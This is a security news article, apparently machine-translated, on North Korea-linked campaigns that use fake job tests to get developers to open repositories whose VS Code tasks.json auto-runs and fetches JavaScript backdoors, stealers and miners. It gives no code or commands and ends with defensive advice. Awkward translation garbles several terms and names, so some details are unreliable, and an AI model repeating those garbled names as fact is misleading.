The Threat that Exploits Visual Studio Code Tasks to Run Remote Code

Security researchers have been watching a disturbing variation in the techniques of North Korea-related groups for weeks: instead of using only classic phishing emails or web exploits, they are exploiting the daily workflow of developers. The trick is to convince engineers - especially those working in cryptomoneda, blockchain and finance - to clone a repository and open the project in Visual Studio Code, with the hook of a supposed technical exercise or a job offer. If the victim trusts the repository and opens the project, a chain is activated that can end up delivering a backdoor with remote execution capabilities.

The central mechanism of the attack is the VS Code task configuration files (tasks.json), which can be configured to run automatically when the project folder is opened. That option - legitimately used to automate development tasks - is being abused to orchestrate downloads and execution of obuscated JavaScript code hosted in external services as domains in Vercel. Public investigations and technical reports have documented how this same tactic has served to deploy malware families such as BeaverTail (Node.js layer) and InvisibleFerret (Python layer), as well as miners and backdoors known for the threat ecosystem.

The initial analyses, published by groups such as OpenSourceMalware and extended by signatures such as Jamf, show a constant evolution: when the project is opened in VS Code, the application requests the user to indicate whether to trust the repository author; if that confidence is granted, VS Code automatically processes tasks.json and can run arbitrary commands on the machine. In macOS, for example, it has been seen how the running chain is launched in the background - using system standard tools - to recover and run a JavaScript payload with Node.js, allowing the process to continue even if the editor is closed.

The remote JavaScript acts as the main implant: it creates a persistent loop that collects basic computer information, makes fingerprinting and maintains continuous communication with a command and control server, enabling remote code execution. In some incidents it was found that minutes after the initial infection additional instructions were downloaded that beaconize the server every few seconds, execute more code and, in the operator's order, clean up traces to make the investigation difficult. Researchers have even pointed to signs of the use of artificial intelligence tools to generate parts of the code, due to the presence of inline comments and some writing style in JavaScript.

In addition to the main technique, actors have prepared booking routes to maximize their success rate. If the task of VS Code fails to recover the payload from Vercel, the repository can hide sophisticated droppers within files that appear to be harmless - for example, "dictionaries" for orthographic correction - that also contain JavaScript osfuscado. In other cases the installation of a malicious npm unit is offered (the package has been identified) grayavatar in public analysis) or the download of a Node.js driver who in turn launches modules to record pulses, capture screens, search sensitive files in the user directory, supplant copied portfolio addresses to the clipboard and extract credentials from browsers. In parallel, the attackers prepare a Python environment that facilitates cryptomoneda mining with XMRig, remote access tools and data exfiltration.

Additional research has documented variants with different names and components: equipment such as Asgard Network have analyzed repositories that distribute a backdoor called Tsunami (also known as TsunamiKit) along with an XMRig miner, while other technical reports have described how attackers approach victims via professional networks such as LinkedIn to send links to technical tests that point to malicious repositories, exploiting professional trust.

Behind these operations are actors linked to the North Korean regime, who have historically focused on software specialists with access to financial infrastructure and digital keys. The benefit for the attacking group is clear: access to source code, secrets, accounts and, in many cases, move or steal digital assets. The variation and multiplicity of the observed vectors suggests a deliberate strategy of experimenting with different techniques to increase the likelihood of commitment and, therefore, the ability to finance their operations.

These campaigns are also a lesson on how legitimate tools for developers can become attack vectors when blindly trusted in external content. Visual Studio Code offers functions designed to save time, but such automation can become dangerous if controls and good practices are not applied. If you want to look into how the VS Code tasks work, official documentation is a good starting point: Task documentation in Visual Studio Code.

For those working in development or managing technical equipment, the recommendation is clear: do not give automatic confidence to unknown repositories, review any tasks.json before allowing its execution and treat external dependencies with caution. Organizations should complement these measures with network controls that block suspicious domains, restrictive implementation policies for development environments and detection tools that can identify beaconing, persistence and mining behaviour. Public reports and analysis of groups such as Jamf, Red Asgard and Security Alliance provide useful technical details for defenders who want to understand and mitigate these threats; you can consult their publications to expand the reading: Jamf, Asgard Network and Security Alliance.

In short, the threat is not only technical but cultural: relying on repositories and technical exercises without verifying their origin is a human vulnerability that the attackers exploit with creativity. The good news is that, contrary to the zero-day vulnerabilities gaps, this abuse is better managed by digital hygiene policies and practices: inspecting, questioning and limiting automatic execution in the development environment can prevent an interview or academic challenge from becoming the gateway for a persistent backdoor.